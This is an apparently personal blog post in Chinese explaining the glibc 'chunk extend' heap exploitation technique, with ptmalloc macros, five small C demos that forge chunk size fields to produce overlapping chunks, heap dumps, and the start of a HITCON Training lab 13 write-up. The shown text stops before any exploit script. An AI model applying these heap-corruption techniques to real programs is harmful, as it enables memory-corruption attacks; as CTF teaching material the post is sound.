<!DOCTYPE html>
<html>
  <head><meta name="generator" content="Hexo 3.9.0">
      <script>
  var _hmt = _hmt || []
  ;(function() {
    var hm = document.createElement('script')
    hm.src = 'https://hm.baidu.com/hm.js?5a0acc897fd96474a2c8f4deac84611a'
    var s = document.getElementsByTagName('script')[0]
    s.parentNode.insertBefore(hm, s)
  })()
</script> 
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content>
    <meta name="description" content>
    
    <title>
      chunk extend - pumpkin9
    </title>
    <link rel="manifest" href="/manifest.json">
    <link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon">
    <link rel="stylesheet" href="/style/style.css">
  </head>
  <body>
    
    <div id="post-toc" class="animated hiddenToc hide">
      <span class="title">Toc</span>
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#介绍"><span class="toc-text">介绍</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#原理"><span class="toc-text">原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#基本示例1：对-inuse-的fastbin-进行extend"><span class="toc-text">基本示例1：对 inuse 的fastbin 进行extend</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#基本示例2：对-inuse-的-smallbin-进行-extend"><span class="toc-text">基本示例2：对 inuse 的 smallbin 进行 extend</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#基本示例3：对-free-的-smallbin-进行-extend"><span class="toc-text">基本示例3：对 free 的 smallbin 进行 extend</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Chunk-Extend-Shrink-可以做什么"><span class="toc-text">Chunk Extend/Shrink 可以做什么</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#基本示例4：通过-extend-后向-overlapping"><span class="toc-text">基本示例4：通过 extend 后向 overlapping</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#基本示例5：通过extend-前向-overlapping"><span class="toc-text">基本示例5：通过extend 前向 overlapping</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#HITCON-Training-lab-13"><span class="toc-text">HITCON Training lab 13</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#基本功能"><span class="toc-text">基本功能</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#利用"><span class="toc-text">利用</span></a></li></ol>
    </div>
    
    <div id="fixed-menu-wrap">
      <span class="iconfont icon-sousuo search-box menu-reset"></span>
      <span class="icon-toc menu-reset">Toc</span>
      <span class="iconfont icon-arrowup menu-reset"></span>
    </div>
    <div id="fixed-menu">
      <span class="iconfont icon-menu-"></span>
    </div>
    <div id="progress">
      <div class="line"></div>
    </div>
    <div id="search-shade" class="animated hiddenSearch hide">
      <div class="input-wrap">
        <span class="iconfont icon-sousuo search-box"></span>
        <input type="text" placeholder="Search">
        <span class="iconfont icon-close"></span>
      </div>
      <div class="search-result">
        <div class="meta">
          <span><b id="result-count">0</b> results found</span>
          <img src="/images/logo.jpeg">
        </div>
        <ul id="result-box"></ul>
      </div>
    </div>
    <div id="menu-mask" class="animated hideMenuMask hide">
      <span class="iconfont icon-close"></span>
      <div class="nav">
        
        <a href="/" class>
          Home
        </a>
        
        <a href="/archives" class>
          Archives
        </a>
        
        <a href="/categories" class>
          Categories
        </a>
        
        <a href="/tags" class>
          Tags
        </a>
        
        <a href="/friends" class>
          Friends
        </a>
        
        <a href="/about" class>
          About
        </a>
        
      </div>
    </div>
    <div id="header">
      <div class="intro">
        <a href="/" class="logo" style="background-image: url('/images/logo.jpeg')"></a>
        <div class="author">pumpkin9</div>
      </div>
      <div class="nav">
        <span class="iconfont icon-menu menu-icon"></span>
        <a href="#" class="search-box">
          <span class="iconfont icon-sousuo"></span>
        </a>
      </div>
    </div>
    <div id="side" class="animated bounceInLeft">
      <div class="shrink">
        <a href="/" class="logo" style="background-image: url('/images/logo.jpeg')"></a>
        <span class="iconfont icon-menu toggle-icon"></span>
        <a href="#" class="search-box">
          <span class="iconfont icon-sousuo"></span>
        </a>
      </div>
      <div class="magnify">
        <div class="about">
          <div class="author">pumpkin9</div>
          <a href="/" class="logo" style="background-image: url('/images/logo.jpeg')"></a>
        </div>

        <div class="nav">
          
          <a href="/" class>
            Home
          </a>
          
          <a href="/archives" class>
            Archives
          </a>
          
          <a href="/categories" class>
            Categories
          </a>
          
          <a href="/tags" class>
            Tags
          </a>
          
          <a href="/friends" class>
            Friends
          </a>
          
          <a href="/about" class>
            About
          </a>
          
          <a href="#" class="search-box">
            <span class="iconfont icon-sousuo"></span>
          </a>
        </div>
        <div class="bottom">
          <div class="follow">
             
            <a href="/atom.xml" target="_block">
              <span class="iconfont icon-rss"></span>
            </a>
            
          </div>
        </div>
      </div>
    </div>
    <div id="container">
      <div class="main animated bounceInRight delay-0.7s">
        <article class="post-entry">
    <div class="header">
      
      <div class="title">chunk extend</div>
      <div class="meta">
        <span class="item">
          <span class="iconfont icon-time-circle"></span>
          <span>2019/10/21</span>
        </span>

        
          <span class="item leancloud-visitors" id="/2019/10/21/chunk-extend/" data-flag-title="chunk extend">
            <span class="iconfont icon-eye1"></span>
            <span class="leancloud-visitors-count"></span>
          </span>
        

         
        <span class="item">
          <span class="iconfont icon-folder"></span>
          <span>
              
                
                  <a href="/categories/CTF">CTF</a>
                
              
          </span>
        </span>
        
        
         
          <span class="item">
            <span class="iconfont icon-tag1"></span>
            <span>
                
                  
                    <a href="/tags/pwn">pwn</a>
                  
                
                  
                    <a href="/tags/heap">heap</a>
                  
                
            </span>
          </span>
         
      </div>
      <div>
      </div>
    </div>
    <h2 id="介绍">介绍<a class="post-anchor" href="#介绍"></a></h2><p>chunk extend 是堆漏洞的一种常见利用手法，通过 extend 可以实现 chunk overlapping 的效果。这种利用方法需要以下的时机和条件</p>
<ul>
<li>程序中存在基于堆的漏洞</li>
<li>漏洞可以控制 chunk header 中的数据</li>
</ul>
<h2 id="原理">原理<a class="post-anchor" href="#原理"></a></h2><p>chunk extend 技术能够产生的原因在于 ptmalloc 在堆 chunk 进行操作时使用的各种宏。</p>
<p>在 ptmalloc 中，获取 chunk 块大小操作如下</p>
<pre><code class="hljs cpp"><span class="hljs-comment">/* Get size, ignoring use bits */</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> chunksize(p) (chunksize_nomask(p) &amp; ~(SIZE_BITS))</span>

<span class="hljs-comment">/* Like chunksize, but do not mask SIZE_BITS.  */</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> chunksize_nomask(p) ((p)-&gt;mchunk_size)</span></code></pre>

<p>一种是直接获取 chunk 的大小，不忽略掩码部分，另外一种是忽略掩码部分。</p>
<p>在 ptmalloc 中，获取下一 chunk 块地址的操作如下</p>
<pre><code class="hljs cpp"><span class="hljs-comment">/* Ptr to next physical malloc_chunk. */</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> next_chunk(p) ((mchunkptr)(((char *) (p)) + chunksize(p)))</span></code></pre>

<p>即使用当前块指针加上当前块大小。</p>
<p>在 ptmalloc 中，获取前一个chunk 信息的操作如下</p>
<pre><code class="hljs cpp"><span class="hljs-comment">/* Size of the chunk below P.  Only valid if prev_inuse (P).  */</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> prev_size(p) ((p)-&gt;mchunk_prev_size)</span>

<span class="hljs-comment">/* Ptr to previous physical malloc_chunk.  Only valid if prev_inuse (P).  */</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> prev_chunk(p) ((mchunkptr)(((char *) (p)) - prev_size(p)))</span></code></pre>

<p>即通过 malloc_chunk-&gt;prev_size 获取前一块大小，然后使用本 chunk 地址减去所得大小。</p>
<p>在 ptmalloc，判断当前 chunk 是否 use 状态的操作如下：</p>
<pre><code class="hljs cpp"><span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> inuse(p)</span>
    ((((mchunkptr)(((<span class="hljs-keyword">char</span> *) (p)) + chunksize(p)))-&gt;mchunk_size) &amp; PREV_INUSE)</code></pre>

<p>即查看下一个 chunk 的 prev_inuse 域，而下一块地址又如我们前面所述是根据当前chunk size 计算得出</p>
<p>通过上面几个宏可以看出，ptmalloc 通过 chunk header 的数据判断 chunk 的使用情况和对chunk 的前后块进行定位。简而言之，chunk extend 就是通过控制 size 和 prev_size 域来实现跨越块操作从而导致 overlapping的。</p>
<p>与 chunk extend 类似的还有一种称为 chunk shrink 的操作。这里只介绍 chunk extend 的利用。</p>
<h2 id="基本示例1：对-inuse-的fastbin-进行extend">基本示例1：对 inuse 的fastbin 进行extend<a class="post-anchor" href="#基本示例1：对-inuse-的fastbin-进行extend"></a></h2><p>简单来说，该利用的效果是通过更改第一个块的大小来控制第二个块的内容。<strong>注意，我们的示例都是在 64 位的程序。如果想在32位下进行测试，可以把 8 字节偏移改为 4 字节。</strong></p>
<pre><code class="hljs cpp"><span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span>
</span>&#123;
    <span class="hljs-keyword">void</span> *ptr,*ptr1;

    ptr=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<span class="hljs-comment">//分配第一个0x10的chunk</span>
    <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<span class="hljs-comment">//分配第二个0x10的chunk</span>

    *(<span class="hljs-keyword">long</span> <span class="hljs-keyword">long</span> *)((<span class="hljs-keyword">long</span> <span class="hljs-keyword">long</span>)ptr<span class="hljs-number">-0x8</span>)=<span class="hljs-number">0x41</span>;<span class="hljs-comment">// 修改第一个块的size域</span>

    <span class="hljs-built_in">free</span>(ptr);
    ptr1=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x30</span>);<span class="hljs-comment">// 实现 extend，控制了第二个块的内容</span>
    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
&#125;</code></pre>

<p>当两个 malloc 语句执行之后，堆的内存分布如下</p>
<pre><code class="hljs cpp"><span class="hljs-number">0x602000</span>:   <span class="hljs-number">0x0000000000000000</span>  <span class="hljs-number">0x0000000000000021</span> &lt;=== chunk <span class="hljs-number">1</span>
<span class="hljs-number">0x602010</span>:   <span class="hljs-number">0x0000000000000000</span>  <span class="hljs-number">0x0000000000000000</span>
<span class="hljs-number">0x602020</span>:   <span class="hljs-number">0x0000000000000000</span>  <span class="hljs-number">0x0000000000000021</span> &lt;=== chunk <span class="hljs-number">2</span>
<span class="hljs-number">0x602030</span>:   <span class="hljs-number">0x0000000000000000</span>  <span class="hljs-number">0x0000000000000000</span>
<span class="hljs-number">0x602040</span>:   <span class="hljs-number">0x0000000000000000</span>  <span class="hljs-number">0x0000000000020fc1</span> &lt;=== top chunk</code></pre>

<p>之后，我们会把 chunk1 的 size 域更改为 0x41，0x41 是因为 chunk 的 size 域包含了用户控制的大小和 header 的大小。如上所示正好大小为 0x40.在题目中这一步可以由堆溢出得到。</p>
<pre><code class="hljs cpp"><span class="hljs-number">0x602000</span>:   <span class="hljs-number">0x0000000000000000</span>  <span class="hljs-number">0x0000000000000041</span> &lt;=== 篡改大小
<span class="hljs-number">0x602010</span>:   <span class="hljs-number">0x0000000000000000</span>  <span class="hljs-number">0x0000000000000000</span>
<span class="hljs-number">0x602020</span>:   <span class="hljs-number">0x0000000000000000</span>  <span class="hljs-number">0x0000000000000021</span>
<span class="hljs-number">0x602030</span>:   <span class="hljs-number">0x0000000000000000</span>  <span class="hljs-number">0x0000000000000000</span>
<span class="hljs-number">0x602040</span>:   <span class="hljs-number">0x0000000000000000</span>  <span class="hljs-number">0x0000000000020fc1</span></code></pre>

<p>执行 free 之后，我们可以看到 chunk2 与 chunk1 合成一个 0x40 大小的 chunk，一起释放了。</p>
<pre><code class="hljs assembly">Fastbins[idx=0, size=0x10] 0x00
Fastbins[idx=1, size=0x20] 0x00
Fastbins[idx=2, size=0x30]  ←  Chunk(addr=0x602010, size=0x40, flags=PREV_INUSE)
Fastbins[idx=3, size=0x40] 0x00
Fastbins[idx=4, size=0x50] 0x00
Fastbins[idx=5, size=0x60] 0x00
Fastbins[idx=6, size=0x70] 0x00</code></pre>

<p>之后我们通过 malloc(0x30) 得到 chunk1 + chunk2 的块，此时就可以直接控制 chunk2 中的内容，我们也把这种状态称为 overlapping chunk。</p>
<pre><code class="hljs assembly">call   0x400450 &lt;malloc@plt&gt;
mov    QWORD PTR [rbp-0x8], rax

rax = 0x602010</code></pre>

<h2 id="基本示例2：对-inuse-的-smallbin-进行-extend">基本示例2：对 inuse 的 smallbin 进行 extend<a class="post-anchor" href="#基本示例2：对-inuse-的-smallbin-进行-extend"></a></h2><p>通过之前深入理解堆的实现部分的内容，我们得知处于 fastbin 范围的 chunk 释放后会被植入 fastbin 链表中。以下这个示例中，我们使用 0x80 这个大小来分配堆（作为对比，fastbin 默认的最大的 chunk 可使用的范围是 0x70）</p>
<pre><code class="hljs cpp"><span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span>
</span>&#123;
    <span class="hljs-keyword">void</span> *ptr,*ptr1;

    ptr=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x80</span>);<span class="hljs-comment">//分配第一个 0x80 的chunk1</span>
    <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>); <span class="hljs-comment">//分配第二个 0x10 的chunk2</span>
    <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>); <span class="hljs-comment">//防止与top chunk合并</span>

    *(<span class="hljs-keyword">int</span> *)((<span class="hljs-keyword">int</span>)ptr<span class="hljs-number">-0x8</span>)=<span class="hljs-number">0xb1</span>;
    <span class="hljs-built_in">free</span>(ptr);
    ptr1=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0xa0</span>);
&#125;</code></pre>

<p>在这个例子中，因为分配的 size 不处于 fastbin 的范围，因此在释放时如果与 top chunk 相连会导致和 top chunk 合并。所以我们需要额外分配一个chunk ，把释放的块与 top chunk 隔开。</p>
<pre><code class="hljs assembly">0x602000:   0x0000000000000000  0x00000000000000b1 &lt;===chunk1 篡改size域
0x602010:   0x0000000000000000  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000000
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000000
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000000
0x602090:   0x0000000000000000  0x0000000000000021 &lt;=== chunk2
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x0000000000000000  0x0000000000000021 &lt;=== 防止合并的chunk
0x6020c0:   0x0000000000000000  0x0000000000000000
0x6020d0:   0x0000000000000000  0x0000000000020f31 &lt;=== top chunk</code></pre>

<p>释放后，chunk1 把 chunk2 的内容吞并掉并一起置入 unsorted bin</p>
<pre><code class="hljs assembly">0x602000:   0x0000000000000000  0x00000000000000b1 &lt;=== 被放入unsorted bin
0x602010:   0x00007ffff7dd1b78  0x00007ffff7dd1b78
0x602020:   0x0000000000000000  0x0000000000000000
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000000
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000000
0x602090:   0x0000000000000000  0x0000000000000021
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x00000000000000b0  0x0000000000000020 &lt;=== 注意此处标记为空
0x6020c0:   0x0000000000000000  0x0000000000000000
0x6020d0:   0x0000000000000000  0x0000000000020f31 &lt;=== top chunk</code></pre>

<pre><code class="hljs assembly">[+] unsorted_bins[0]: fw=0x602000, bk=0x602000
 →   Chunk(addr=0x602010, size=0xb0, flags=PREV_INUSE)</code></pre>

<p>再次进行分配的时候就会取回 chunk1 和 chunk2 的空间，此时我们就可以控制 chunk2 中的内容</p>
<pre><code class="hljs assembly">    0x4005b0 &lt;main+74&gt;        call   0x400450 &lt;malloc@plt&gt;
→   0x4005b5 &lt;main+79&gt;        mov    QWORD PTR [rbp-0x8], rax

    rax : 0x0000000000602010</code></pre>

<h2 id="基本示例3：对-free-的-smallbin-进行-extend">基本示例3：对 free 的 smallbin 进行 extend<a class="post-anchor" href="#基本示例3：对-free-的-smallbin-进行-extend"></a></h2><p>示例3 是在示例2 的基础上进行的，这次我们先释放 chunk1，然后再修改处于 unsorted bin 中的 size 域。</p>
<pre><code class="hljs cpp"><span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span>
</span>&#123;
    <span class="hljs-keyword">void</span> *ptr,*ptr1;

    ptr=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x80</span>);<span class="hljs-comment">//分配第一个0x80的chunk1</span>
    <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<span class="hljs-comment">//分配第二个0x10的chunk2</span>

    <span class="hljs-built_in">free</span>(ptr);<span class="hljs-comment">//首先进行释放，使得chunk1进入unsorted bin</span>

    *(<span class="hljs-keyword">int</span> *)((<span class="hljs-keyword">int</span>)ptr<span class="hljs-number">-0x8</span>)=<span class="hljs-number">0xb1</span>;
    ptr1=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0xa0</span>);
&#125;</code></pre>

<p>两次 malloc 之后的结果如下</p>
<pre><code class="hljs assembly">0x602000:   0x0000000000000000  0x0000000000000091 &lt;=== chunk 1
0x602010:   0x0000000000000000  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000000
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000000
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000000
0x602090:   0x0000000000000000  0x0000000000000021 &lt;=== chunk 2
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x0000000000000000  0x0000000000020f51</code></pre>

<p>我们首先释放 chunk1 使他进入 unsorted bin 中</p>
<pre><code class="hljs assembly">     unsorted_bins[0]: fw=0x602000, bk=0x602000
 →   Chunk(addr=0x602010, size=0x90, flags=PREV_INUSE)

0x602000:   0x0000000000000000  0x0000000000000091 &lt;=== 进入unsorted bin
0x602010:   0x00007ffff7dd1b78  0x00007ffff7dd1b78
0x602020:   0x0000000000000000  0x0000000000000000
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000000
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000000
0x602090:   0x0000000000000090  0x0000000000000020 &lt;=== chunk 2
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x0000000000000000  0x0000000000020f51 &lt;=== top chunk</code></pre>

<p>然后 篡改 chunk1 的 size 域</p>
<pre><code class="hljs cpp"><span class="hljs-number">0x602000</span>:   <span class="hljs-number">0x0000000000000000</span>  <span class="hljs-number">0x00000000000000b1</span> &lt;=== size域被篡改
<span class="hljs-number">0x602010</span>:   <span class="hljs-number">0x00007ffff7dd1b78</span>  <span class="hljs-number">0x00007ffff7dd1b78</span>
<span class="hljs-number">0x602020</span>:   <span class="hljs-number">0x0000000000000000</span>  <span class="hljs-number">0x0000000000000000</span>
<span class="hljs-number">0x602030</span>:   <span class="hljs-number">0x0000000000000000</span>  <span class="hljs-number">0x0000000000000000</span>
<span class="hljs-number">0x602040</span>:   <span class="hljs-number">0x0000000000000000</span>  <span class="hljs-number">0x0000000000000000</span>
<span class="hljs-number">0x602050</span>:   <span class="hljs-number">0x0000000000000000</span>  <span class="hljs-number">0x0000000000000000</span>
<span class="hljs-number">0x602060</span>:   <span class="hljs-number">0x0000000000000000</span>  <span class="hljs-number">0x0000000000000000</span>
<span class="hljs-number">0x602070</span>:   <span class="hljs-number">0x0000000000000000</span>  <span class="hljs-number">0x0000000000000000</span>
<span class="hljs-number">0x602080</span>:   <span class="hljs-number">0x0000000000000000</span>  <span class="hljs-number">0x0000000000000000</span>
<span class="hljs-number">0x602090</span>:   <span class="hljs-number">0x0000000000000090</span>  <span class="hljs-number">0x0000000000000020</span>
<span class="hljs-number">0x6020a0</span>:   <span class="hljs-number">0x0000000000000000</span>  <span class="hljs-number">0x0000000000000000</span>
<span class="hljs-number">0x6020b0</span>:   <span class="hljs-number">0x0000000000000000</span>  <span class="hljs-number">0x0000000000020f51</span></code></pre>

<p>此时再进行 malloc 分配就可以得到 chunk1+chunk2 的堆块，从而控制了 chunk2 的内容。</p>
<h2 id="Chunk-Extend-Shrink-可以做什么">Chunk Extend/Shrink 可以做什么<a class="post-anchor" href="#Chunk-Extend-Shrink-可以做什么"></a></h2><p> 一般来说，这种技术并不能直接控制程序的执行流程，但是可以控制 chunk 中的内容。如果 chunk 存在字符串指针、函数指针等，就可以利用这些指针来进行信息泄露和控制执行流程。</p>
<p>此外通过 extend 可以实现 chunk overlapping ，通过 overlapping 可以控制 chunk 的 fd/bk 指针从而可以实现 fastbin attack 等利用。</p>
<h2 id="基本示例4：通过-extend-后向-overlapping">基本示例4：通过 extend 后向 overlapping<a class="post-anchor" href="#基本示例4：通过-extend-后向-overlapping"></a></h2><p>这里展示通过 extend 进行后向 overlapping，这也是在 CTF 中最常出现的情况，通过 overlapping 可以实现其他的一些利用。</p>
<pre><code class="hljs cpp"><span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span>
</span>&#123;
    <span class="hljs-keyword">void</span> *ptr,*ptr1;

    ptr=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<span class="hljs-comment">//分配第1个 0x80 的chunk1</span>
    <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>); <span class="hljs-comment">//分配第2个 0x10 的chunk2</span>
    <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>); <span class="hljs-comment">//分配第3个 0x10 的chunk3</span>
    <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>); <span class="hljs-comment">//分配第4个 0x10 的chunk4    </span>
    *(<span class="hljs-keyword">int</span> *)((<span class="hljs-keyword">int</span>)ptr<span class="hljs-number">-0x8</span>)=<span class="hljs-number">0x61</span>;
    <span class="hljs-built_in">free</span>(ptr);
    ptr1=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x50</span>);
&#125;</code></pre>

<p>在 malloc(0x50) 对 extend 区域重新占位后，其中 0x10 的fastbin 块依然可以正常的分配和释放，此时已经构成 overlapping，通过对 overlapping 的进行操作可以实现 fastbin attack。</p>
<h2 id="基本示例5：通过extend-前向-overlapping">基本示例5：通过extend 前向 overlapping<a class="post-anchor" href="#基本示例5：通过extend-前向-overlapping"></a></h2><p>这里展示通过修改 pre_inuse 域和 pre_size 域实现合并前面的块。</p>
<pre><code class="hljs cpp"><span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span>
</span>&#123;
    <span class="hljs-keyword">void</span> *ptr1,*ptr2,*ptr3,*ptr4;
    ptr1=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">128</span>);<span class="hljs-comment">//smallbin1</span>
    ptr2=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<span class="hljs-comment">//fastbin1</span>
    ptr3=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<span class="hljs-comment">//fastbin2</span>
    ptr4=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">128</span>);<span class="hljs-comment">//smallbin2</span>
    <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<span class="hljs-comment">//防止与top合并</span>
    <span class="hljs-built_in">free</span>(ptr1);
    *(<span class="hljs-keyword">int</span> *)((<span class="hljs-keyword">long</span> <span class="hljs-keyword">long</span>)ptr4<span class="hljs-number">-0x8</span>)=<span class="hljs-number">0x90</span>;<span class="hljs-comment">//修改pre_inuse域</span>
    *(<span class="hljs-keyword">int</span> *)((<span class="hljs-keyword">long</span> <span class="hljs-keyword">long</span>)ptr4<span class="hljs-number">-0x10</span>)=<span class="hljs-number">0xd0</span>;<span class="hljs-comment">//修改pre_size域</span>
    <span class="hljs-built_in">free</span>(ptr4);<span class="hljs-comment">//unlink进行前向extend</span>
    <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x150</span>);<span class="hljs-comment">//占位块</span>
&#125;</code></pre>

<p>前向 extend 利用了 small bin 的 unlink 机制，通过修改 pre_size 域可以跨越多个chunk 进行合并实现 overlapping。</p>
<h2 id="HITCON-Training-lab-13">HITCON Training lab 13<a class="post-anchor" href="#HITCON-Training-lab-13"></a></h2><p>程序为 64 位动态链接程序，主要开启了 Canary 保护与 NX 保护。</p>
<p><strong>程序逻辑</strong></p>
<pre><code class="hljs bash">--------------------------------
          Heap Creator          
--------------------------------
 1. Create a Heap               
 2. Edit a Heap                 
 3. Show a Heap                 
 4. Delete a Heap               
 5. Exit                        
--------------------------------</code></pre>

<p><strong>创建堆</strong></p>
<pre><code class="hljs cpp"><span class="hljs-keyword">unsigned</span> __<span class="hljs-function">int64 <span class="hljs-title">create_heap</span><span class="hljs-params">()</span>
</span>&#123;
  _QWORD *v0; <span class="hljs-comment">// rbx</span>
  <span class="hljs-keyword">signed</span> <span class="hljs-keyword">int</span> i; <span class="hljs-comment">// [rsp+4h] [rbp-2Ch]</span>
  <span class="hljs-keyword">size_t</span> size; <span class="hljs-comment">// [rsp+8h] [rbp-28h]</span>
  <span class="hljs-keyword">char</span> buf; <span class="hljs-comment">// [rsp+10h] [rbp-20h]</span>
  <span class="hljs-keyword">unsigned</span> __int64 v5; <span class="hljs-comment">// [rsp+18h] [rbp-18h]</span>

  v5 = __readfsqword(<span class="hljs-number">0x28</span>u);
  <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i &lt;= <span class="hljs-number">9</span>; ++i )
  &#123;
    <span class="hljs-keyword">if</span> ( !heaparray[i] )
    &#123;
      heaparray[i] = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>uLL);
      <span class="hljs-keyword">if</span> ( !heaparray[i] )
      &#123;
        <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Allocate Error"</span>);
        <span class="hljs-built_in">exit</span>(<span class="hljs-number">1</span>);
      &#125;
      <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Size of Heap : "</span>);
      read(<span class="hljs-number">0</span>, &amp;buf, <span class="hljs-number">8u</span>LL);
      size = atoi(&amp;buf);
      v0 = heaparray[i];
      v0[<span class="hljs-number">1</span>] = <span class="hljs-built_in">malloc</span>(size);
      <span class="hljs-keyword">if</span> ( !*((_QWORD *)heaparray[i] + <span class="hljs-number">1</span>) )
      &#123;
        <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Allocate Error"</span>);
        <span class="hljs-built_in">exit</span>(<span class="hljs-number">2</span>);
      &#125;
      *(_QWORD *)heaparray[i] = size;
      <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Content of heap:"</span>, &amp;buf);
      read_input(*((_QWORD *)heaparray[i] + <span class="hljs-number">1</span>), size);
      <span class="hljs-built_in">puts</span>(<span class="hljs-string">"SuccessFul"</span>);
      <span class="hljs-keyword">return</span> __readfsqword(<span class="hljs-number">0x28</span>u) ^ v5;
    &#125;
  &#125;
  <span class="hljs-keyword">return</span> __readfsqword(<span class="hljs-number">0x28</span>u) ^ v5;
&#125;</code></pre>

<p><strong>编辑堆，比之前创建堆时的size多读入了一个字节，造成 off-by-one</strong></p>
<pre><code class="hljs cpp"><span class="hljs-keyword">unsigned</span> __<span class="hljs-function">int64 <span class="hljs-title">edit_heap</span><span class="hljs-params">()</span>
</span>&#123;
  <span class="hljs-keyword">int</span> v1; <span class="hljs-comment">// [rsp+Ch] [rbp-14h]</span>
  <span class="hljs-keyword">char</span> buf; <span class="hljs-comment">// [rsp+10h] [rbp-10h]</span>
  <span class="hljs-keyword">unsigned</span> __int64 v3; <span class="hljs-comment">// [rsp+18h] [rbp-8h]</span>

  v3 = __readfsqword(<span class="hljs-number">0x28</span>u);
  <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Index :"</span>);
  read(<span class="hljs-number">0</span>, &amp;buf, <span class="hljs-number">4u</span>LL);
  v1 = atoi(&amp;buf);
  <span class="hljs-keyword">if</span> ( v1 &lt; <span class="hljs-number">0</span> || v1 &gt; <span class="hljs-number">9</span> )
  &#123;
    <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Out of bound!"</span>);
    _exit(<span class="hljs-number">0</span>);
  &#125;
  <span class="hljs-keyword">if</span> ( heaparray[v1] )
  &#123;
    <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Content of heap : "</span>, &amp;buf);
    read_input(*((_QWORD *)heaparray[v1] + <span class="hljs-number">1</span>), *(_QWORD *)heaparray[v1] + <span class="hljs-number">1L</span>L);
    <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Done !"</span>);
  &#125;
  <span class="hljs-keyword">else</span>
  &#123;
    <span class="hljs-built_in">puts</span>(<span class="hljs-string">"No such heap !"</span>);
  &#125;
  <span class="hljs-keyword">return</span> __readfsqword(<span class="hljs-number">0x28</span>u) ^ v3;
&#125;</code></pre>

<h3 id="基本功能">基本功能<a class="post-anchor" href="#基本功能"></a></h3><p>程序大概是一个自定义的堆分配器，每个堆主要有两个成员：大小与内容指针。主要功能如下</p>
